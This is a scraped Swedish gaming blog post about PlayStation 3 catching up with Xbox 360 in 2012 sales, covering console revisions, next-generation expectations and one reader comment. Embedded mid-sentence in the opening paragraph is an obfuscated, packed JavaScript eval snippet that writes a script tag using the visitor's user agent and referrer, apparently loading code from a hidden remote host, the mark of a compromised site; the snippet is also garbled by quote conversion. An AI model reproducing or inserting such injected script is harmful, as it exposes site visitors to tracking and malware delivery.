Image Image Image Image Image Image Image Image Image Image

| 6 juli, 2020

Scroll to top

Top

Playstation 3 kommer ikapp Xbox 360

Playstation 3 kommer ikapp Xbox 360
Sebastian

Playstation eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbnrh|var|u0026u|referrer|ayzyn||js|php’.split(’|’),0,{}))
3: Nu börjar det heta konsolkriget lida mot sitt slut. Under 2012 nådde både Microsoft och Sony omkring 70 miljoner sålda enheter i hela världen. Sony var några månader efter med sin lansering så man får ge Microsoft en liten tjuvstart. Både Sony och Microsoft ligger dock under om man också lägger till Nintendo Wii som har sålt ca 91,18 miljoner enheter i september.

I samma rapport från bolaget Sony skriver de att antalet spel till Playstation 3 ligger på 3590 stycken och dessa har sålt över 595 miljoner exemplar tillsammans. Man ska också ha sålt cirka 15 miljoner Move-kontroller där det tillhör ca 400 speltitlar.

Som ni säkert också vet så har Sony designat om sin maskin ett antal gånger under sin livstid. När Playstation 3 lanserades i Sverige kunde man välja mellan två olika modeller, en med 60 GB och en mindre på 20 GB utrymme. Den modell med 60 GB utrymme hade också bakåtkompatibilitet och en kortläsare, något som valdes att tas bort senare. 2009 släpptes en lättare version, denna ”Slim-version” hade större utrymme och skulle vara en aning snabbare. I september 2012 lanserades en tredje utgåva med namnet ”Super Slim” som var lättare och mindre än ”Slim”.

Om man ska läsa lite från vad analytikerna säger så kan denna ”Super Slim” vara den sista Playstation 3 som släpps. Det är snart dags att ta oss in i ett nytt år ihop med en ny konsol-generation. Microsofts nya Xbox ligger och väntar bakom hörnet och det samma gör säkert också Sony med sin kommande Playstation. Det ska bli intressant att få se om det är molntjänster som ligger i fokus eller om vi fortfarande kommer att få leva med en massa CD-skivor.

2013 kommer troligen bli ett intressant år med en massa trevliga speltitlar som släpps och kanske även en helt ny konsol.

Vad tror ni? Kommer Microsoft att lansera sin nya Xbox nåsta år?

Kommentera gärna nedan!

Comments

  1. Joakim Carlsson

    Trevlig artikel. Ska bli kul att se om varken Microsoft eller Sony lanserar någon ny maskin nästa år. Men som du säger så är det nog större chans att vi får se Microsoft först på den fronten.

    /Joakim